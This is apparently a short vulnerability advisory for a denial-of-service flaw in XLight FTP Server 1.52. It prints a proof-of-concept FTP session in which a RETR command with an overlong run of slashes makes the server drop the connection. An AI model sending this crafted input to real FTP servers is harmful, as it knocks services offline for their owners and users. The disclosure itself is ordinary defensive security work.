|
|
XLight FTP Server Remote Send File Request Denial Of Service Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided: ftp> open To www.example.com Connected to www.example.com. 220 Xlight Server 1.52 ready... User (www.example.com:(none)): test 331 Password required for test Password: 230 Login OK. ftp> literal pasv 227 Entering passive mode . ftp> literal retr ///////////////////////////////////////// /////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////// //////////////////////////////////////////qwer Connection closed by remote host. |
|
Privacy Statement |